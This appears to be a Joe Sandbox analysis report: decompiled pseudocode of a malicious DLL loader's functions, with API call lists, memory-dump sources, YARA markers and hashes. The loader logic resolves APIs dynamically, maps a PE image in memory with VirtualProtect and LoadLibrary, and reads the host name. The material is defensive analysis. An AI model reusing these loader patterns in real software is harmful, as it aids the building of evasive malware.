                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                                                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                    				if(_t76 < 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t76;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t40 = E02F93AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                    				_t76 = _t40;
                                                                                                                                                                                                                                    				if(_t76 >= 0) {
                                                                                                                                                                                                                                    					_t61 = _a28;
                                                                                                                                                                                                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t76 >= 0) {
                                                                                                                                                                                                                                    						_t43 =  *_t55;
                                                                                                                                                                                                                                    						_t68 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    						_t20 = _t68 + 0x2f9e1fc; // 0x740053
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                                                                                    							_t76 = E02F97C14(_a4);
                                                                                                                                                                                                                                    							if(_t76 >= 0) {
                                                                                                                                                                                                                                    								_t65 = _a28;
                                                                                                                                                                                                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                    									_t50 = _a4;
                                                                                                                                                                                                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t45 = _a4;
                                                                                                                                                                                                                                    						if(_t45 != 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t57 = __imp__#6;
                                                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a20);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a12);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t41 = _v8;
                                                                                                                                                                                                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F93AEF: SysAllocString.OLEAUT32(80000002), ref: 02F93B46
                                                                                                                                                                                                                                      • Part of subcall function 02F93AEF: SysFreeString.OLEAUT32(00000000), ref: 02F93BAB
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02F99231
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(02F91885), ref: 02F9923B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                                                                                    • Opcode ID: e80404c66a1aa7334208d7c091e48d878076b0c8ef660a04f88fd41bd089dde6
                                                                                                                                                                                                                                    • Instruction ID: a85a96a669b2414ca223ff9ecb385fae983b4ad11a6c543a308669886ca9d96d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80404c66a1aa7334208d7c091e48d878076b0c8ef660a04f88fd41bd089dde6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1315A72900118AFDF21EFA5CC88C9BBB7AFFC97847114698F9159B210E3719D91CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0040135A() {
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void _v32;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                    				int _t26;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t15 =  *0x404150;
                                                                                                                                                                                                                                    				if( *0x40412c > 5) {
                                                                                                                                                                                                                                    					_t16 = _t15 + 0x4050f9;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t16 = _t15 + 0x4050b1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				E00401FE7(_t16, _t16);
                                                                                                                                                                                                                                    				_t36 = 6;
                                                                                                                                                                                                                                    				memset( &_v32, 0, _t36 << 2);
                                                                                                                                                                                                                                    				if(E00401414( &_v32,  &_v16,  *0x40414c ^ 0xfd7cd1cf) == 0) {
                                                                                                                                                                                                                                    					_t25 = 0xb;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t26 = lstrlenW( *0x404138);
                                                                                                                                                                                                                                    					_t8 = _t26 + 2; // 0x2
                                                                                                                                                                                                                                    					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                                                                                                                                    					_t30 = E0040102F(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                    						_t32 = _v36;
                                                                                                                                                                                                                                    						 *_t32 = 0;
                                                                                                                                                                                                                                    						if( *0x404138 == 0) {
                                                                                                                                                                                                                                    							 *((short*)(_t32 + 4)) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							E0040200D(_t44, _t32 + 4);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t25 = E00401E11(_v28); // executed
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				ExitThread(_t25);
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExitThreadlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2636182767-0
                                                                                                                                                                                                                                    • Opcode ID: d0f5276c7d2ce7e0a5e41471ba7a2c6755e937518a4a13e4d3d01d1591e5aeb6
                                                                                                                                                                                                                                    • Instruction ID: 89559214658415b618ba5696c5fb43bb06a1630c8a8f3c3b56ffde9c1baf62f0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0f5276c7d2ce7e0a5e41471ba7a2c6755e937518a4a13e4d3d01d1591e5aeb6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C711BB71408205AFE711EBA5CD48D9B77ECEB48304F01083AB645FB1B1E734E5458B9A
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E02F954BC(void* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = __imp__;
                                                                                                                                                                                                                                    				_t20 = 0;
                                                                                                                                                                                                                                    				_v8 = _v8 & 0;
                                                                                                                                                                                                                                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                    				_t10 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					_t20 = E02F92049(_t10 + 1);
                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                    						if(_t15 != 0) {
                                                                                                                                                                                                                                    							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							E02F99039(_t20);
                                                                                                                                                                                                                                    							_t20 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,02F9A306,76D7F710,00000000,?,?,02F9A306), ref: 02F954D4
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,02F9A306,02F9A307,?,?,02F9A306), ref: 02F954F1
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 187446995-0
                                                                                                                                                                                                                                    • Opcode ID: f263cf12439c1fdb39b0745f4aea7aaad9e6280f739de30d994f7d5471a14312
                                                                                                                                                                                                                                    • Instruction ID: 981320daf0963b8bf439fb18e8d76caf5e946a92c59a5b3f37367eeca2b25463
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f263cf12439c1fdb39b0745f4aea7aaad9e6280f739de30d994f7d5471a14312
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86F05436A00109BBFF11D6AA9C01EAF76AEDBC5A94F510069AA04D3241EA70DE058B70
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t14 = 1;
                                                                                                                                                                                                                                    				_t4 = _a8;
                                                                                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                                                                                    					if(InterlockedDecrement(0x2f9d23c) == 0) {
                                                                                                                                                                                                                                    						E02F9970F();
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_t4 == 1 && InterlockedIncrement(0x2f9d23c) == 1) {
                                                                                                                                                                                                                                    						_t10 = E02F96A56(_t11, _t12, _a4); // executed
                                                                                                                                                                                                                                    						if(_t10 != 0) {
                                                                                                                                                                                                                                    							_t14 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(02F9D23C), ref: 02F9806A
                                                                                                                                                                                                                                      • Part of subcall function 02F96A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02F9807D,?), ref: 02F96A69
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(02F9D23C), ref: 02F9808A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3834848776-0
                                                                                                                                                                                                                                    • Opcode ID: 329ab4024eaea948216575358483ba9b3715df4e5242042d2abab0828277292d
                                                                                                                                                                                                                                    • Instruction ID: 14812f5c8ec6e42eaafda05859f160df8a2602f130275672d6553b505d331765
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 329ab4024eaea948216575358483ba9b3715df4e5242042d2abab0828277292d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3E04F75A4426557BE316B74DC04B5EF755AB02FC4F054A14F785D4174C752C4908AD1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E02F99318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				short _t17;
                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                    				short _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				_t15 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t4 = _t15 + 0x2f9e39c; // 0x33e8944
                                                                                                                                                                                                                                    				_t20 = _t4;
                                                                                                                                                                                                                                    				_t6 = _t15 + 0x2f9e124; // 0x650047
                                                                                                                                                                                                                                    				_t17 = E02F99152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                    				if(_t17 < 0) {
                                                                                                                                                                                                                                    					_t23 = _t17;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_v20 != 8) {
                                                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t19 = E02F99FC9(_t20, _v12);
                                                                                                                                                                                                                                    						if(_t19 == 0) {
                                                                                                                                                                                                                                    							_t23 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a16 = _t19;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__imp__#6(_v12);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F99152: SysFreeString.OLEAUT32(?), ref: 02F99231
                                                                                                                                                                                                                                      • Part of subcall function 02F99FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02F97946,004F0053,00000000,?), ref: 02F99FD2
                                                                                                                                                                                                                                      • Part of subcall function 02F99FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02F97946,004F0053,00000000,?), ref: 02F99FFC
                                                                                                                                                                                                                                      • Part of subcall function 02F99FC9: memset.NTDLL ref: 02F9A010
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F9937E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 397948122-0
                                                                                                                                                                                                                                    • Opcode ID: 8b1bd5712305eab52b7e68243b0af9633cb857934010a6678e60df1ecfa488ab
                                                                                                                                                                                                                                    • Instruction ID: d1d56bf8bcbd34cee49845b8df4782cbb6e7b4ea181d1b78dd6ae2fc786e440d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b1bd5712305eab52b7e68243b0af9633cb857934010a6678e60df1ecfa488ab
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E01D432900019BFEF119FA8CC04DAEBBBDFB48784F024929EA11E31A0D3B19954CBD1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E00401FE7(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				 *0x404148 =  *0x404148 & 0x00000000;
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push(0x404144);
                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                                    				 *0x404140 = 0xc; // executed
                                                                                                                                                                                                                                    				L00401BD6(); // executed
                                                                                                                                                                                                                                    				return __eax;
                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401387,00000001,00404144,00000000), ref: 00402005
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3907675253-0
                                                                                                                                                                                                                                    • Opcode ID: 9b2c487b67a07d99fdd9699fa098756d513cf92635e2e3c07589c75f82ff200c
                                                                                                                                                                                                                                    • Instruction ID: 64a343feecbe3ef0b73f5dc68f4200e7203235e6a0c8b6df44520468a7cd6f76
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b2c487b67a07d99fdd9699fa098756d513cf92635e2e3c07589c75f82ff200c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0C04CF4140300A7E6209F019D4AF05766177E4709F204529F3003A1E093F91094851D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F92049(long _a4) {
                                                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t2 = RtlAllocateHeap( *0x2f9d238, 0, _a4); // executed
                                                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                    • Opcode ID: 5468bf9a7f5bc09c9303cd972960506b6578b56e856f946461114634b27c2073
                                                                                                                                                                                                                                    • Instruction ID: e1a2be2bb2d43527d9685a1eb281740708a3f2363a71e46c2179db9f042f98bd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5468bf9a7f5bc09c9303cd972960506b6578b56e856f946461114634b27c2073
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10B01236C80104ABCA015B00DD05F05FF21AB58F40F104911B20484070C3314470EB05
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E00401E11(void* __eax) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t41 = __eax;
                                                                                                                                                                                                                                    				_t16 =  *0x40414c;
                                                                                                                                                                                                                                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4);
                                                                                                                                                                                                                                    				_t18 = E00401A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                    					_t29 = 8;
                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t40 = _v8;
                                                                                                                                                                                                                                    					_t29 = E0040125B(_t33, _t40, _t41);
                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                                                                                                                    						_t24 = E00401745(_t40, _t44); // executed
                                                                                                                                                                                                                                    						_t29 = _t24;
                                                                                                                                                                                                                                    						if(_t29 == 0) {
                                                                                                                                                                                                                                    							_t26 = E00401179(_t44, _t40); // executed
                                                                                                                                                                                                                                    							_t29 = _t26;
                                                                                                                                                                                                                                    							if(_t29 == 0) {
                                                                                                                                                                                                                                    								_push(_t26);
                                                                                                                                                                                                                                    								_push(1);
                                                                                                                                                                                                                                    								_push(_t40);
                                                                                                                                                                                                                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                                                                                                                    									_t29 = GetLastError();
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t42 = _v12;
                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                                                                                                                    					E00401DFC(_t42);
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return _t29;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401E4D,?,?,?,?,?,00000002,?,00401401), ref: 00401A33
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A55
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A6B
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A81
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A97
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401AAD
                                                                                                                                                                                                                                      • Part of subcall function 0040125B: memcpy.NTDLL(?,?,?), ref: 00401288
                                                                                                                                                                                                                                      • Part of subcall function 0040125B: memcpy.NTDLL(?,?,?), ref: 004012BB
                                                                                                                                                                                                                                      • Part of subcall function 00401745: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040177D
                                                                                                                                                                                                                                      • Part of subcall function 00401179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004011B2
